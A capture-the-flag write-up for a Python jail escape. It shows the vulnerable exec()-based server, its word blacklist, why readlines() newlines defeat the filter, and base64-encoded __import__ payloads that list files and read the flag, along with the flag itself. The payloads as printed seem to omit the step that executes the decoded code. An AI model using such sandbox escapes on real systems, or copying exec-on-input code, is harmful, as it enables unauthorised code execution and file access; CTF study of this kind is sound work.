Pwn - I want to break free

204 solves | 205 points

Description

I want to break free... from this Python jail.

Downloads

1KB

jailpublic.zip

archive

Open

Solution

This time we need to escape a python jail. We are provided the source code and server address so, the goal is likely to gain code execution on the server. Taking a look at the source code:

#!/usr/bin/env python3

def server():
    message = """
    You are in jail. Can you escape?
"""
    print(message)
    while True:
        try:
            data = input("> ")
            safe = True
            for char in data:
                if not (ord(char)>=33 and ord(char)<=126):
                    safe = False
            with open("blacklist.txt","r") as f:
                badwords = f.readlines()
            for badword in badwords:
                if badword in data or data in badword:
                    safe = False
            if safe:
                print(exec(data))
            else:
                print("You used a bad word!")
        except Exception as e:
            print("Something went wrong.")
            print(e)
            exit()

if __name__ == "__main__":      
    server()

And the blacklist:

cat
grep
nano
import
eval
subprocess
input
sys
execfile
builtins
open
dict
exec
for
dir
file
input
write
while
echo
print
int
os

The code is very simple and given the limited attack surface area, we can immediately tell that vulnerable code is in the exec command. The first thing we want to do is to try to use the import command as that would allow us to do many things. However, it didn't work because the import command is blacklisted. A quick search of python sandbox escape payloads, gives us the __import__ keyword and it bypassed the blacklist!

Hmm, that's weird though. Shouldn't line 18 of the source code prevent this since import is in the __import__ string? Let's print out the blacklist array at line 17 by adding print(badwords).

Ahh, now it all makes sense. The python file readlines() method not only read in the blacklisted words but also the newline character. Since __import__ in not in the import\n string and import\n string is not in the __import__ string, the sanitization is bypassed. Afterwards, gaining access is trivial. There are probably many ways to read the flag but during the CTF, we used python's default base64 library to encode and decode our payload. The first command we sent was to list the server's directory:

# Actual encoded b64 payload: print(__import__('os').listdir())
__import__('base64').b64decode('cHJpbnQoX19pbXBvcnRfXygnb3MnKS5saXN0ZGlyKCkp')

There is a suspicious text file with a really long file name. Our next payload is to read that file:

# Actual encoded b64 payload: print(open("cf7728be7980fd770ce03d9d937d6d4087310f02db7fcba6ebbad38bd641ba19.txt").read())
__import__('base64').b64decode('cHJpbnQob3BlbigiY2Y3NzI4YmU3OTgwZmQ3NzBjZTAzZDlkOTM3ZDZkNDA4NzMxMGYwMmRiN2ZjYmE2ZWJiYWQzOGJkNjQxYmExOS50eHQiKS5yZWFkKCkp')

Flag: kqctf{0h_h0w_1_w4n7_70_br34k_fr33_e73nfk1788234896a174nc}